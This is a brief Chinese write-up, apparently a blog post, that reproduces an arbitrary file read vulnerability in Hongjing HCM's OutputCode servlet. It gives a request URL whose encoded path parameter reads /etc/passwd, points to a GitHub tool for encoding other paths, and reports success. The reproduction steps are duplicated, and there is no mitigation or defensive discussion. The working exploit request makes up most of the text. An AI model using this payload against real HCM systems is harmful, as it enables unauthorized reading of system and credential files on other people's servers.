宏景HCM OutputCode任意文件读取漏洞
漏洞复现:
1、读取/etc/passwd
http:url/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP
其中path字段加密通过下面工具来实现
工具地址:https://github.com/wafinfo/DecryptTools
读取成功
漏洞复现:
1、读取/etc/passwd
http:url/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP
其中path字段加密通过下面工具来实现
工具地址:https://github.com/wafinfo/DecryptTools
读取成功
浙公网安备 33010602011771号